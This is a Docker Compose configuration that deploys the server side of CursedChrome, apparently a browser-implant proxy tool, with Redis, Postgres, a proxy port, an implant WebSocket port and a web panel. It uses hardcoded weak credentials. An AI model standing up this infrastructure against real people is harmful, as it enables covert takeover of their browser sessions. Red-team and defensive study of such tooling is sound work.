version: '3.2'
services:
  redis:
    image: "redis:alpine"
    command: redis-server --appendonly no
  db:
    image: postgres
    restart: always
    volumes:
      - cursedchrome-db:/var/lib/postgresql/data
    environment:
      POSTGRES_PASSWORD: cursedchrome
      POSTGRES_USER: cursedchrome
      POSTGRES_DB: cursedchrome
  cursedchrome:
    image: "s045pd/cursed_chrome:latest"
    volumes:
      - cursedchrome-web:/work/cassl
    depends_on:
      - db
      - redis
    restart: always
    environment:
      DATABASE_NAME: cursedchrome
      DATABASE_USER: cursedchrome
      DATABASE_PASSWORD: cursedchrome
      DATABASE_HOST: db
      REDIS_HOST: redis
      BCRYPT_ROUNDS: 10
    ports:
      - "8119:8080" # Proxy server
      - "4343:4343" # WebSocket server (talks with implants)
      - "8118:8118" # Web panel
volumes:
  cursedchrome-web:
  cursedchrome-db:
